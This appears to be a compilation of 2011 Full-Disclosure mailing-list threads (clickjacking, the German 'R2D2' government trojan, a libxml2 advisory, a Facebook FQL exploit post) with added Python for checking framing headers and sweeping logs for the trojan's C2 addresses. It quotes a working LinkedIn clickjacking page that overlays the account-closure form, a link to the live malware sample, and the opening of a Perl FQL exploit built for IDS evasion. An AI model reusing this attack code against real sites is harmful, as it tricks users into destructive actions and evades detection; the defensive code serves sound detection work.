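                if same_origin:
                    return True
            elif _source_matches(source, top_origin):
                return True
        return False                                 # nothing matched, or 'none', or empty list

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return same_origin
    if xfo.startswith("ALLOW-FROM "):                # obsolete; never supported by every browser
        allowed = urlsplit(xfo.split(None, 1)[1].lower())
        t = urlsplit(top_origin.lower())
        return (allowed.scheme, allowed.hostname, allowed.port) == (t.scheme, t.hostname, t.port)
    return True                                      # no (or unrecognised) protection: framable


if __name__ == "__main__":
    # Constructed responses; the hostnames are placeholders, not observed headers.
    page, attacker = "https://www.example.com", "https://attacker.example"
    cases = {
        "no headers": {},
        "XFO DENY": {"X-Frame-Options": "DENY"},
        "XFO SAMEORIGIN": {"X-Frame-Options": "SAMEORIGIN"},
        "CSP allow-list": {"Content-Security-Policy":
                           "default-src 'self'; frame-ancestors 'self' https://*.example.com"},
    }
    for name, hdrs in cases.items():
        print(f"{name:15s} framable from {attacker}: {framing_allowed(hdrs, page, attacker)}")
```

The first case is the one the PoC relies on: with no header at all the function returns True, meaning the page will render in the attacker's iframe. Note that an empty `frame-ancestors` list and `frame-ancestors 'none'` both block every framer, including the site itself, which is the intended reading of the directive.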
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote:

On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said:

You sir, are an idiot.

s/an/a/ - FTFY.

A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJOkeoxAAoJEMtrOhzH8m1pnyUQAIBCSeFX0kv39a/OYx9EGdOI
j3PID8kFBESUA3N1+1gA4dq9KBCQrXzM78gJ0HoKSOc5+XdcpmO4ImRtIfNb4nsW
jXfNlR2Zn6rd9qk+8u6c7VlsZR9Q8b8jFojPZ1qq5jrZP/B3L7+oKAxCI9Z+6XSn
1hFtGCP0ODuX10hjMLmaJv0zyzqnoNI6Ifu+Pt+sFauU2eg3e5aq6+nDSyODcy/A
2517pai2YTN/9qk3YSK+6DRwb1lhUK/i2XX2TOVhuIZkG+HgbDaywczQ17MH+6Vv
iP/fm0scXHKGRKOCDl2XeSKkEjHRKS8sF/B9B1qpCObl5EcDPg58MBRhAQjCZxuo
mh5hEcrdb+HFibiWQi8aV/BZeAaX9V0AV4ZwPdbEVKQvSZqr3YTUHL8PPcDIszja
OTQqwKd3hlNOxIiG/1TiXIe+UEcqknO9Q43TAqJTTT5oQXGdgRv1d/1w1PDnr/6I
gjum1tpJUM/83uTaQbGHq2zM+Lr9VFinXZMaYohu5Zr3rBxyOyU1II115rJT+2q6
0dyZ7yK5nblFwYTYrF+8OiC7ZBHT+HHWjn8bdW6z3x4A+hR6Z8yu0AeEdzYQfnLS
N68dIhnllxhwgaIGTgPQqnintPnT1BO1egjmROjdzduaTDfTbp1H9mzNZmz6R3hT
9/KfNcozodZg3IAR0Mju
=DN3I
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On Sun, 09 Oct 2011 13:38:41 CDT, Laurelai said:

On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote:

On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said:

You sir, are an idiot.

s/an/a/ - FTFY.

A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know.

Hint - it's even funnier if you reread my note and select "view all headers". ;)
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10/9/2011 2:18 PM, valdis.kletni...@vt.edu wrote:

On Sun, 09 Oct 2011 13:38:41 CDT, Laurelai said:

On 10/9/2011 12:04 PM, valdis.kletni...@vt.edu wrote:

On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said:

You sir, are an idiot.

s/an/a/ - FTFY.

A goes before words that begin with consonants. An goes before words that begin with vowels. The more you know.

Hint - it's even funnier if you reread my note and select "view all headers". ;)

Yeah, I caught that when you told me. Well played, sir... well played.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJOkfPUAAoJEMtrOhzH8m1pT3YP/jbFvCk3MMEB4OtWmTlXfV86
kjk0h/VDOM8TWj3tIh9Wf7CAmXKIR5zGKPyHB9mshYTCx8XpR4qfs1mSMkh6MyXl
NV9ha+aaKSfPJj7sPfBPhiS6xcXnmlGgX/VFKSWLThF0KypdRJ3L8BpdUZOZ6zaw
c+6rPq4o0XZ7yH2KUIGpOFp/noKUEj/lI8udAo7Q6trkft9GZ8sm9SCBTjTiUmq9
/7LsDvjX2Oa39/opTb6w6Z05ANGqLG4uL1mrvdAfHsBIfqHw1GzuJYTRtPXaB9Wf
iQfJihVpy2p/fi9/eMPbyYOAuMdbBZsENmUFRDQFvi3AdXvpLUVHMKFWQX0Qlhif
ElYAF1NG9m/WbIIjkgBnByhBQ+0vvP61H0a4ZIS+BUrxOtPTW0WS8r2zRIcX8rLX
FNly7dO23bMX+xiUp2JGtnpMu0x6Qdcez7Tc26WwqTwD6wNRZq1gtgsygsS5MIET
8q0qEcAth/bA4zTXnk7EmXgFlPFGmTpGb+Ls9XH4XCJHybS5jc4AAAMvbw7NgmKd
WnC6Cmp/NR435XRr77UNpR/RqOmDQ7SD6dy3zFzrw9wbYKmASJzTSGP0J/fL1/dD
DedGc4E+3zutXg2PjNVSwbuwPeRT2TOpprfnwQlU5yJ1S0zv1M6T2A4ieAjiVtSI
e5/OdQBsZ5rvxi04SBJ1
=W/oP
-----END PGP SIGNATURE-----
[Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Hi List,

I thought this could be interesting. My English is not very good, so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html):

Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government.

The announcement was made public on ccc.de (http://www.ccc.de/) with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF (in German): http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf

The malware in question is a Windows backdoor consisting of a DLL and a kernel driver.

The backdoor includes a keylogger that targets certain applications. These applications include Firefox, Skype, MSN Messenger, ICQ and others.

The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls.

In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 and 207.158.22.134.

According to CCC Germany the backdoor could also be exploited by third parties.

You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz. You'll need gzip and tar to get the .dll and the .sys file.
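The two server addresses quoted above are the kind of indicator a responder turns into a log sweep the same day. The following is an added example by the editor, not part of the post, the F-Secure write-up or the CCC report: a small detection pass over firewall connection logs that parses the destination address and matches it against an indicator list, rather than grepping for the dotted string. The log format and every log line are constructed for the example; only the two indicator IPs come from the post. The parsed match avoids the false positive that a substring grep for 83.236.140.90 produces on a destination such as 183.236.140.90, and it accepts CIDR ranges so the same code can be fed netblocks once more hosts are known.

```python
"""Match firewall connection logs against a C2 indicator list by parsing the
destination address instead of substring-matching the line."""
import ipaddress
import re

# The two C2 addresses named in the post. Everything else in this file is constructed.
C2_INDICATORS = ["83.236.140.90", "207.158.22.134"]

# Constructed log format (not a real product's):
#   <timestamp> <host> <ACCEPT|DROP> src=<ip>:<port> dst=<ip>:<port> proto=<proto>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<action>ACCEPT|DROP) "
    r"src=(?P<src>[0-9.]+):(?P<sport>\d+) dst=(?P<dst>[0-9.]+):(?P<dport>\d+) "
    r"proto=(?P<proto>\w+)$"
)

# Constructed sample lines, including one near-miss address and one unparseable line.
SAMPLE_LOG = """\
2011-10-09T21:14:02Z fw01 ACCEPT src=10.0.5.23:49211 dst=83.236.140.90:443 proto=tcp
2011-10-09T21:14:05Z fw01 ACCEPT src=10.0.5.23:49212 dst=93.184.216.34:80 proto=tcp
2011-10-09T21:15:40Z fw01 DROP src=10.0.7.8:51000 dst=207.158.22.134:80 proto=tcp
2011-10-09T21:16:01Z fw01 ACCEPT src=10.0.5.23:49213 dst=183.236.140.90:443 proto=tcp
garbage line that does not parse
"""


def load_indicators(items):
    """Accept single addresses or CIDR ranges; a bare address becomes a /32."""
    return [ipaddress.ip_network(item, strict=False) for item in items]


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_c2_connections(log_text, indicators=C2_INDICATORS):
    """Return one record per connection whose destination falls inside an indicator,
    with the matching indicator recorded alongside the parsed fields."""
    nets = load_indicators(indicators)
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue                      # keep unparseable lines from aborting the sweep
        dst = ipaddress.ip_address(rec["dst"])
        for net in nets:
            if dst in net:
                rec["indicator"] = str(net)
                hits.append(rec)
                break
    return hits


def substring_grep(log_text, indicators=C2_INDICATORS):
    """What a plain grep does: substring match, so 183.236.140.90 also 'hits'."""
    return [line for line in log_text.splitlines()
            if any(ioc in line for ioc in indicators)]


if __name__ == "__main__":
    for hit in find_c2_connections(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['dport']} "
              f"({hit['action']}) matches {hit['indicator']}")
    print(f"parsed matches: {len(find_c2_connections(SAMPLE_LOG))}, "
          f"substring matches: {len(substring_grep(SAMPLE_LOG))}")
```

A DROP line is still a hit worth keeping: the firewall blocked the connection, but the source host tried to reach the C2 address, which is the fact the responder needs.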
[Full-disclosure] [ MDVSA-2011:145 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1
___
Mandriva Linux Security Advisory MDVSA-2011:145
http://www.mandriva.com/security/
___
Package : libxml2
Date: October 9, 2011
Affected: 2009.0, 2010.1, 2011., Enterprise Server 5.0
___
Problem Description:

Double free vulnerabilities in libxml2 allow remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted XPath expression and via vectors related to XPath handling (CVE-2011-2821, CVE-2011-2834).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct these issues.
___
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2821
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2834
___
Updated Packages:

Mandriva Linux 2009.0:
209b07b6de051ff5aec516f90d0422f4 2009.0/i586/libxml2_2-2.7.1-1.8mdv2009.0.i586.rpm
79a2f6e4f012fdd417f379e0b0036d54 2009.0/i586/libxml2-devel-2.7.1-1.8mdv2009.0.i586.rpm
cb0134183154b0014b08aad4b37ea73a 2009.0/i586/libxml2-python-2.7.1-1.8mdv2009.0.i586.rpm
118448ed71392dd8c2684277b49e4b74 2009.0/i586/libxml2-utils-2.7.1-1.8mdv2009.0.i586.rpm
b684a79602cb5e1bbf368642d85f68fa 2009.0/SRPMS/libxml2-2.7.1-1.8mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
998b5bb8b7d018f03136b646e1b06fdb 2009.0/x86_64/lib64xml2_2-2.7.1-1.8mdv2009.0.x86_64.rpm
b1df1cc7c73c6e8d5b3bc0d39f43fa8d 2009.0/x86_64/lib64xml2-devel-2.7.1-1.8mdv2009.0.x86_64.rpm
b2e99d7897c1bd6263017f02e98623ae 2009.0/x86_64/libxml2-python-2.7.1-1.8mdv2009.0.x86_64.rpm
b7dcd0efbe0280e34fe007e278932a77 2009.0/x86_64/libxml2-utils-2.7.1-1.8mdv2009.0.x86_64.rpm
b684a79602cb5e1bbf368642d85f68fa 2009.0/SRPMS/libxml2-2.7.1-1.8mdv2009.0.src.rpm

Mandriva Linux 2010.1:
b390da9668b76bcf7ffcc8a7bbb53cb5 2010.1/i586/libxml2_2-2.7.7-1.4mdv2010.2.i586.rpm
be6fd2244124176aabf9f89b051f7542 2010.1/i586/libxml2-devel-2.7.7-1.4mdv2010.2.i586.rpm
dceee4844d365d68c4fe84c69bdd45cc 2010.1/i586/libxml2-python-2.7.7-1.4mdv2010.2.i586.rpm
0e45e718e4ef244cb3da314d7d5fe170 2010.1/i586/libxml2-utils-2.7.7-1.4mdv2010.2.i586.rpm
a1f749d4ef5dc23d760d2d8dc79b7e80 2010.1/SRPMS/libxml2-2.7.7-1.4mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
8e9c6a2893459d61c8987a4791838c7f 2010.1/x86_64/lib64xml2_2-2.7.7-1.4mdv2010.2.x86_64.rpm
5a65bad0467ce6c6bccadedbd6ba7300 2010.1/x86_64/lib64xml2-devel-2.7.7-1.4mdv2010.2.x86_64.rpm
4b4add103bd98bfb13d92a83bd69d232 2010.1/x86_64/libxml2-python-2.7.7-1.4mdv2010.2.x86_64.rpm
67c5b1c6e287b153c521c125d7f4c40a 2010.1/x86_64/libxml2-utils-2.7.7-1.4mdv2010.2.x86_64.rpm
a1f749d4ef5dc23d760d2d8dc79b7e80 2010.1/SRPMS/libxml2-2.7.7-1.4mdv2010.2.src.rpm

Mandriva Linux 2011:
a06dd522b3cac6eb67be595b34edab80 2011/i586/libxml2_2-2.7.8-6.2-mdv2011.0.i586.rpm
d5356190d0ca32bb10d7df3bf4b53626 2011/i586/libxml2-devel-2.7.8-6.2-mdv2011.0.i586.rpm
c536fdef7c40640e2c22442ca17c2685 2011/i586/libxml2-python-2.7.8-6.2-mdv2011.0.i586.rpm
d414c5f632c4fb9ccf8452269548c5d4 2011/i586/libxml2-utils-2.7.8-6.2-mdv2011.0.i586.rpm
cae1d275c88bbb8f2d4ea3bc62c15066 2011/SRPMS/libxml2-2.7.8-6.2.src.rpm

Mandriva Linux 2011/X86_64:
2335fd4f854387849e11cbb3a373f619 2011/x86_64/lib64xml2_2-2.7.8-6.2-mdv2011.0.x86_64.rpm
64e6582b9f726f4eaa9a5d79f3277081 2011/x86_64/lib64xml2-devel-2.7.8-6.2-mdv2011.0.x86_64.rpm
9d35412e2549537879ea108350d7a252 2011/x86_64/libxml2-python-2.7.8-6.2-mdv2011.0.x86_64.rpm
8adc79ebc7ce22b78677467a64fd9074 2011/x86_64/libxml2-utils-2.7.8-6.2-mdv2011.0.x86_64.rpm
cae1d275c88bbb8f2d4ea3bc62c15066 2011/SRPMS/libxml2-2.7.8-6.2.src.rpm

Mandriva Enterprise Server 5:
dd45c34e2b9c3427a3e3322122918855 mes5/i586/libxml2_2-2.7.1-1.8mdvmes5.2.i586.rpm
e1ec6cbbf6db0ac41b80591c5697b72d mes5/i586/libxml2-devel-2.7.1-1.8mdvmes5.2.i586.rpm
44c69acf5ea338eeb1c2a885cd6d990b mes5/i586/libxml2-python-2.7.1-1.8mdvmes5.2.i586.rpm
50f4aab7fe60e69a38f5da6b3989c636 mes5/i586/libxml2-utils-2.7.1-1.8mdvmes5.2.i586.rpm
bbcb0ee0595285d0195be0b433b01f51 mes5/SRPMS/libxml2-2.7.1-1.8mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
2f5601898b050b63c6bcc67859b371cc mes5/x86_64/lib64xml2_2-2.7.1-1.8mdvmes5.2.x86_64.rpm
88c3f00377c5bec85a213459cb88f0cd mes5/x86_64/lib64xml2-devel-2.7.1-1.8mdvmes5.2.x86_64.rpm
8ccdad600cdae46d594f5ca37b1bcd57 mes5/x86_64/libxml2-python-2.7.1-1.8mdvmes5.2.x86_64.rpm
8ccf73d9975c8d88844af0230095e6eb
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote:

> Hi List,
>
> I thought this could be interesting. My English is not very good so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html [1]):
>
> Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government. The announcement was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German).
>
> The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134
>
> According to CCC Germany the backdoor could also be exploited by third parties.
>
> You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5]. You'll need gzip and tar to get the .dll and the .sys file.
>
> Links:
> --
> [1] http://www.f-secure.com/weblog/archives/2249.html
> [2] http://www.ccc.de/
> [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
> [4] http://webmail.0m3ga.net/tel:83.236.140.90
> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz

I was looking at this just late last night.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
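The post above names two addresses the backdoor connects to. As an added example, not part of the original post nor of the CCC or F-Secure analyses, the Python below sweeps connection records for those two addresses. Only the addresses come from the thread; the log layout, the sensor name and every log line are constructed here for illustration and do not come from any real firewall or capture.

```python
import ipaddress
import re
from collections import namedtuple

# The two addresses named in the post above. The labels are ours, not CCC's.
R2D2_C2 = {
    ipaddress.ip_address("83.236.140.90"): "0zapftis C2 (named in CCC report)",
    ipaddress.ip_address("207.158.22.134"): "0zapftis C2 (named in CCC report)",
}

Hit = namedtuple("Hit", "timestamp host src dst note")

# Assumed record layout, made up for this example:
#   "<ISO timestamp> <sensor> conn <src>:<sport> -> <dst>:<dport>"
_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+conn\s+"
    r"(?P<src>[0-9.]+):\d+\s*->\s*(?P<dst>[0-9.]+):(?P<port>\d+)"
)


def scan(lines, iocs=R2D2_C2):
    """Return a Hit for every parsable record whose destination is an IOC."""
    hits = []
    for line in lines:
        m = _LINE.match(line)
        if m is None:
            continue  # not a connection record: skip it, do not abort the sweep
        try:
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue  # malformed address in the log, e.g. an octet above 255
        if dst in iocs:
            hits.append(Hit(m["ts"], m["host"], m["src"], str(dst), iocs[dst]))
    return hits


def infected_hosts(lines, iocs=R2D2_C2):
    """Distinct internal sources that talked to an IOC, in first-seen order."""
    seen = []
    for hit in scan(lines, iocs):
        if hit.src not in seen:
            seen.append(hit.src)
    return seen


# Constructed sample log, not real traffic. 192.0.2.10 is a TEST-NET address
# and 999.1.1.1 is deliberately malformed to exercise the error path.
SAMPLE_LOG = [
    "2011-10-09T14:02:11Z fw1 conn 10.0.0.23:51432 -> 83.236.140.90:443",
    "2011-10-09T14:02:12Z fw1 conn 10.0.0.23:51433 -> 192.0.2.10:80",
    "2011-10-09T14:03:40Z fw1 conn 10.0.0.42:49201 -> 207.158.22.134:443",
    "2011-10-09T14:03:41Z fw1 conn 10.0.0.42:49202 -> 999.1.1.1:443",
    "this line is not a connection record",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.src} -> {hit.dst}  [{hit.note}]")
```

Address indicators age quickly and the report only says the sample connects to these servers, so a hit is a lead to pull the host's DLL and driver pair for analysis, not proof of infection on its own.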
Re: [Full-disclosure] Some hash values
On Sun, Oct 9, 2011 at 2:44 PM, Michal Zalewski lcam...@coredump.cx wrote:
>> I believe that this is the best place to post the following hash values:
>> MD5Sum: a762a3b9cbfb3d63034646087680b254
>> SHA1sum: 6f25d72bd693b52de25c36d04f9e17f945420580
>> SHA256sum: d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5
>
> No, for these specific hash values, I believe the appropriate place to post them would be deviantArt.

Use subject 'noise' when posting the hashes of the 0day exploit you are trying to sell. Like this dude: http://seclists.org/fulldisclosure/2011/Jul/21
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
> it seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-), like XSS. I do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS. Anyhow... call it what you like, it is BS (just like the win32 dll crap and simple XSS) CRAP!

xD

On 10 October 2011 04:53, Ferenc Kovacs tyr...@gmail.com wrote:
> it seems that you aren't familiar what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 sec...@gmail.com wrote:
>> That's just lame dude. If you could remove OTHER people's accounts, then I'd say *clap clap*... but own account... what about just clicking close account, and let's skip creating a html page for this... :)
>> cheers
>>
>> On 8 October 2011 17:06, asish agarwalla asishagarwa...@gmail.com wrote:
>>> Be logged into LinkedIn, in Firefox
>>> Create a HTML page using the below code
>>> Open the created HTML page in a new Firefox tab
>>> Play the simple game
>>>
>>> <html>
>>> <head>
>>> <style>
>>> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
>>> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
>>> #Div3{ opacity: 0; position: absolute; top: 25px; left: 160px; }
>>> #Div2{ opacity: 1; position: absolute; top: 65px; left: 340px; }
>>> #Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; }
>>> #victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; }
>>> #victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width:800px; height: 800px; }
>>> </style>
>>> </head>
>>> <body>
>>> <div>
>>> <h1>Please Click Twice on the Right Options And Then Click Submit</h1>
>>> </div>
>>> <div id="Div3">
>>> <h1>55+27=?</h1>
>>> </div>
>>> <div id="victim2">
>>> <h1>55</h1>
>>> </div>
>>> <div id="Div1">
>>> <h1>82</h1>
>>> </div>
>>> <div id="Div2">
>>> <h1>95</h1>
>>> </div>
>>> <button type="button" class="dummy3">Submit</button>
>>> <div id="victim">
>>> <iframe src="https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1" border="0" scrolling="no" width="650" height="1100"></iframe>
>>> </div>
>>> </body>
>>> </html>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
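The PoC in the thread above only works because the framed settings page can be placed in an attacker's iframe at all. As an added example, not code from the original post, the Python below models the two browser-side checks that decide that (X-Frame-Options and the CSP frame-ancestors directive) so a tester can evaluate a captured response offline. The response headers in SAMPLES are constructed for illustration; none were captured from linkedin.com, and partner.example and attacker.example are placeholder hosts.

```python
from urllib.parse import urlsplit


def _origin(url):
    """scheme://host[:port] of a URL, lower-cased, the way browsers compare origins."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _frame_ancestors(csp):
    """Source list of the frame-ancestors directive, or None if the policy has none."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def _source_matches(src, top_origin, framed_origin):
    """Does one frame-ancestors source expression permit top_origin?"""
    if src == "none":
        return False
    if src == "*":
        return True
    if src == "self":
        return top_origin == framed_origin
    if src.endswith(":") and "//" not in src:  # scheme-source such as https:
        return top_origin.startswith(src)
    top = urlsplit(top_origin)
    host = src
    if "://" in src:  # host-source with an explicit scheme
        scheme, host = src.split("://", 1)
        if scheme != top.scheme:
            return False
    host = host.split(":")[0]  # ports are not compared in this model
    if host.startswith("*."):
        return top.hostname is not None and top.hostname.endswith(host[1:])
    return top.hostname == host


def framing_allowed(headers, framed_url, top_url):
    """Return (allowed, reason): may a document at top_url put framed_url in an iframe?"""
    h = {k.lower(): v for k, v in headers.items()}
    framed_origin, top_origin = _origin(framed_url), _origin(top_url)

    ancestors = _frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        # Once frame-ancestors is present, browsers ignore X-Frame-Options.
        ok = any(_source_matches(s, top_origin, framed_origin) for s in ancestors)
        return ok, "CSP frame-ancestors " + " ".join(ancestors)

    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return False, "X-Frame-Options: DENY"
    if xfo == "sameorigin":
        return top_origin == framed_origin, "X-Frame-Options: SAMEORIGIN"
    if xfo.startswith("allow-from"):
        parts = xfo.split(None, 1)
        allowed = _origin(parts[1]) if len(parts) == 2 else ""
        return top_origin == allowed, "X-Frame-Options: ALLOW-FROM (obsolete; browsers without support ignore it)"
    return True, "no framing restriction: the page can be overlaid from any origin"


# Constructed responses for illustration; none were captured from linkedin.com.
SAMPLES = {
    "unprotected": {"Content-Type": "text/html"},
    "xfo_sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp_none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_allowlist": {
        "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example",
        "X-Frame-Options": "DENY",  # ignored once frame-ancestors is present
    },
}

# The URL the PoC frames (from the thread) and a placeholder attacker page.
TARGET = "https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1"
ATTACKER = "https://attacker.example/game.html"

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        ok, why = framing_allowed(hdrs, TARGET, ATTACKER)
        print(f"{name:15} frameable by attacker: {str(ok):5} ({why})")
```

The "unprotected" case is the condition the PoC relies on. Note that the model deliberately lets a frame-ancestors allowlist override X-Frame-Options: DENY, which is how browsers behave, so a site that adds CSP later must not assume the older header still applies.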
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Interesting... although that archive seems corrupt... I'd like to see a bit more about this but, very interesting indeed.. specially Skype ID harvesting, what could this be for. hrms
xD

On 10 October 2011 07:13, ja...@smithwaysecurity.com wrote:
> On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote:
>> Hi List,
>>
>> I thought this could be interesting. My English is not very good so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html [1]):
>>
>> Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government. The announcement was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German).
>>
>> The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134
>>
>> According to CCC Germany the backdoor could also be exploited by third parties.
>>
>> You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5]. You'll need gzip and tar to get the .dll and the .sys file.
>>
>> Links:
>> --
>> [1] http://www.f-secure.com/weblog/archives/2249.html
>> [2] http://www.ccc.de/
>> [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>> [4] http://webmail.0m3ga.net/tel:83.236.140.90
>> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>
> I was looking at this just late last night.
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
Shit man, that's serious business (S-K trying to take over FD). Of course it's not your code, dickwad. All ya know is talking and posting shit on an IT Sec mailing list.

On Sat, Oct 8, 2011 at 7:53 PM, Laurelai laure...@oneechan.org wrote:
> Blackhatacademy has asked me to post this to the mailing list as I'm one of the instructors there. I did not personally develop the exploit; please direct questions regarding it to hatter on irc.blackhatacademy.org
>
> Overview
>
> Over the years, facebook has been vulnerable to numerous web exploitation techniques (http://www.blackhatacademy.org/security101/index.php?title=Web_Exploitation), such as XSS (http://www.blackhatacademy.org/security101/index.php?title=XSS), FQL injection (similar to SQL injection, http://www.blackhatacademy.org/security101/index.php?title=SQL_injection), application worms, and redirect protection bypass. Because they continue to attempt to write their own language implementations, they are repeatedly vulnerable. Security by obscurity doesn't work if they document their own markup language (http://developers.facebook.com/docs/reference/fbml/) and query language (http://developers.facebook.com/docs/reference/fql/) for attackers.
>
> History
>
> XSS (http://www.blackhatacademy.org/security101/index.php?title=XSS) in facebook first started out as a flaw in their fbml markup (http://developers.facebook.com/docs/reference/fbml/) and subsequently became evident in a variety of facebook applications. Applications (http://www.blackhatacademy.org/security101/index.php?title=Applications) also exposed users to third party attacks that could affect a user's web browser or force actions as the affected user. Now there is a way to bypass content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities (http://www.blackhatacademy.org/security101/index.php?title=Vulnerability) on July 31st, 2011.
> To date (October 4, 2011) Facebook has yet to do anything about this, demonstrating a deplorable lack of reasonable care for all of their users. For this reason, the vulnerability (http://www.blackhatacademy.org/security101/index.php?title=Vulnerability) proof of concept code is being brought to light. Facebook has only recently purchased websense to attempt to push this vulnerability under the rug, however the exploit still works.
>
> FQL
>
> Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL does not allow the use of JOINs, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development api page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.
>
> #!/usr/bin/perl
> use warnings;
> use XML::Simple;
> use LW2;
> use Getopt::Std;
>
> my %opts;
> getopts('q:', \%opts);
> my $query = $opts{q} if defined $opts{q};
> $query = "SELECT pic_big FROM user WHERE uid=666" unless defined $opts{q};
> my $ref = fqlQuery($query);
>
> # Walk the parsed XML up to two levels deep and print key/value pairs.
> foreach my $parent (sort keys %{$ref}) {
